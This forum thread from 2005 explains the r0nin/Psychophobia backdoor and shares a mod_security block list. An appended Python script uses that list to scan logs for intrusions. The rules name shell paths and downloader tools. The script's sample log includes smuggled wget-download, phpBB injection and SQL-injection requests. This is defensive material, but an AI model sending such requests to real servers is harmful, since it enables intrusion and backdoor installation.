Forums: R0nin? - Forums

R0nin?

#1 saetji

  • Sergeant
  • Group: Members
  • Posts: 212
  • Joined: 22-October 03

Posted 26 October 2005 - 02:38 PM

I'm not really a nix person myself (yet) but a friend's server seems to be attacked by the r0nin exploit and I can only seem to find references to the exploit and not any details...

Could someone be kind enough to explain what the r0nin exploit is, what it attacks, and how to prevent it? (Links will be fine.)

Thanks

#2 current

  • Private First Class
  • Group: Members
  • Posts: 31
  • Joined: 11-October 05

Posted 26 October 2005 - 03:45 PM

Hi,

The r0nin exploit obviously is a package which uses a really old bug in myPHPNuke to put a backdoor on the system and run it afterwards. This backdoor is named Psychophobia and provides a telnet server.

This seems to be a very old or not very well known package; Google didn't give much.

You should advise your friend to immediately get the newest version of myPHPNuke.

Here is the security advisory: hxxp://secunia.com/advisories/9721/

Greetz,

current

#3 fynflood

  • Private
  • Group: Members
  • Posts: 1
  • Joined: 25-October 05

Posted 27 October 2005 - 06:21 AM

r0nin is a backdoor, which listens on port 1666 by default. You will mostly only see precompiled instances of this... I have yet to come across the source for this specific Psychophobia.

There are many ways it can find its way on your server, and not just "an really old bug in myPHPNuke"; in fact, any php app that has vuls can land it. The newest release of phpBB2 (2.0.17) has exploits out also.

I find mod_security does a very good job of keeping this and other URL-based exploits at bay... Here are the rules I use:


SecFilter /bin/sh
SecFilter /bin/bash
SecFilter /bin/tcsh
SecFilter /bin/csh

SecFilter /var/spool
SecFilter /dev/shm
SecFilter /var/tmp
SecFilter /bin/ps
SecFilter /usr/local/flash

SecFilter udp.pl
SecFilter r0nin
SecFilter pbsync
SecFilter bindz
SecFilter inetd
SecFilter psybnc
SecFilter PhiLaR.pl
SecFilter php-shell.php
SecFilter phpshell.php
SecFilter dc.pl
SecFilter elflbl
SecFilter zregbot
SecFilter irclordz
SecFilter dalnet

#Detect attempts to execute binaries residing in /bin
SecFilterSelective ARGS "/bin/"
SecFilterSelective ARGS "/usr/bin/"

## PHPBB Vulnerability
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilter "admin_styles.php\?" chain
SecFilter "\$_GET"

# WEB-PHP Mail Exploit
SecFilterSelective THE_REQUEST "data/album\.php" deny,log
SecFilter "b77ybvFuiTAy" deny,log

# CPANEL Guestbook
#SecFilter "admin\.php\?action.*uid=1([^0-9]|$)"

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
#SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilterSelective THE_REQUEST "/usr/bin/gcc"

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"

# Require Content-Length to be provided with
# every POST request
# (both lines are commented out together: a rule that ends in "chain"
#  only takes effect with the rule that follows it, so leaving the first
#  line active on its own would chain the POST check onto the next rule
#  in the file instead)
#SecFilterSelective REQUEST_METHOD "^POST$" chain
#SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget"
SecFilterSelective THE_REQUEST "lynx"
SecFilterSelective THE_REQUEST "scp"
SecFilterSelective THE_REQUEST "cvs"
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet"
SecFilterSelective THE_REQUEST "echo"
SecFilterSelective THE_REQUEST "links -dump"
SecFilterSelective THE_REQUEST "links -dump-charset"
SecFilterSelective THE_REQUEST "links -dump-width"
SecFilterSelective THE_REQUEST "links http://"
SecFilterSelective THE_REQUEST "links ftp://"
SecFilterSelective THE_REQUEST "links -source"
SecFilterSelective THE_REQUEST "mkdir"
SecFilterSelective THE_REQUEST "cd /tmp"
SecFilterSelective THE_REQUEST "cd /var/tmp"
SecFilterSelective THE_REQUEST "cd /var/netenberg"
SecFilterSelective THE_REQUEST "uname -a"
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"

# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"

# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"

# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."

# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"

# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"

# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"

# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"

# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"

# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass

# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"

# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"

# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"

# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"

# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"
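As an added example (not part of fynflood's post, and not mod_security's own code), the Python script below re-applies a subset of the patterns from those SecFilter rules to web-server access-log lines, URL-decoding the request target first the way mod_security 1.x does before matching, and then checks a netstat -tlnp style socket listing for a listener on r0nin's default port 1666. The log lines, addresses, PIDs and program names are all constructed for the example; the rule names (shell_binary, scratch_dir, and so on) are labels chosen here, not mod_security identifiers.

```python
"""Offline re-check of the SecFilter patterns from the thread against
access-log lines, plus a look for r0nin's default listener on port 1666.
Example code added to the thread, not mod_security's or the poster's own.
All sample data below is constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Regexes derived from the posted SecFilter / SecFilterSelective rules.
# mod_security 1.x matches SecFilter against the URL-decoded request, so
# match_rules() is given the decoded request target (see decode_target).
RULES: Dict[str, re.Pattern] = {
    "shell_binary":   re.compile(r"/bin/(sh|bash|tcsh|csh|ps)\b"),
    "scratch_dir":    re.compile(r"/(var/tmp|dev/shm|var/spool)\b|cd\s+/(var/)?tmp"),
    "known_backdoor": re.compile(r"r0nin|psybnc|bindz|udp\.pl|php-?shell\.php|PhiLaR\.pl"),
    "downloader":     re.compile(r"\b(wget|lynx|scp|cvs|rcp|telnet)\b|links\s+(-dump|-source|https?://|ftp://)"),
    "phpbb_chr":      re.compile(r"viewtopic\.php\?.*chr\(\d{1,3}\)"),
    "webphp_mail":    re.compile(r"data/album\.php"),
    "script_inject":  re.compile(r"javascript://|img src=javascript|<script"),
    "crude_sqli":     re.compile(r"(delete\s+from|insert\s+into)"),
    "dotfile_access": re.compile(r"/\.(bash_history|history|htaccess|htgroup)"),
}

# Apache common/combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_access_line(line: str) -> Optional[Dict[str, str]]:
    """Return the captured fields of one access-log line, or None if the
    line does not look like a request record."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target: str) -> str:
    """One round of URL-decoding, as mod_security 1.x does before SecFilter
    runs. A double-encoded payload (%2527) therefore decodes to %27 here."""
    return unquote(target)


def match_rules(decoded_target: str) -> List[str]:
    """Names of every rule whose regex matches the decoded request target."""
    return sorted(name for name, rx in RULES.items() if rx.search(decoded_target))


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run every parseable log line through the rules and return the hits."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        names = match_rules(decode_target(rec["target"]))
        if names:
            hits.append({"ip": rec["ip"], "target": rec["target"], "rules": names})
    return hits


def find_listeners(netstat_output: str, port: int = 1666) -> List[Dict[str, str]]:
    """Pick LISTEN sockets bound to `port` out of `netstat -tlnp` style text
    (columns: Proto Recv-Q Send-Q Local Foreign State PID/Program)."""
    found = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] not in ("tcp", "tcp6"):
            continue
        local, state = parts[3], parts[5]
        if state == "LISTEN" and local.rsplit(":", 1)[-1] == str(port):
            found.append({"local": local, "program": parts[6] if len(parts) > 6 else "?"})
    return found


# Constructed sample data: documentation address ranges, invented PIDs and
# invented request lines (one benign, three that the rules should flag).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Oct/2005:06:21:00 +0000] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Oct/2005:06:22:13 +0000] "GET /forum/viewtopic.php?t=1&highlight=%2527.chr(99).%2527 HTTP/1.1" 200 7741',
    '203.0.113.9 - - [27/Oct/2005:06:23:40 +0000] "GET /gallery/data/album.php?cmd=cd%20/var/tmp;wget%20http://203.0.113.5/r0nin HTTP/1.1" 200 310',
    '192.0.2.44 - - [27/Oct/2005:06:25:02 +0000] "GET /shop/item.php?id=1;delete%20from%20orders HTTP/1.1" 500 0',
]

SAMPLE_SOCKETS = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/httpd
tcp        0      0 0.0.0.0:1666            0.0.0.0:*               LISTEN      4242/r0nin
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1100/mysqld
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["target"]} -> {", ".join(hit["rules"])}')
    for sock in find_listeners(SAMPLE_SOCKETS):
        print(f'listener on {sock["local"]} ({sock["program"]})')
```

The decode step is the part worth copying: the posted rules match on the decoded request, so a log review that greps the raw access log for `cd /tmp` or `wget` will miss the `%20`-encoded form that actually arrives on the wire. Decoding only once also mirrors mod_security 1.x, which is why a double-encoded `%2527` still reaches the rules as `%27` rather than a bare quote.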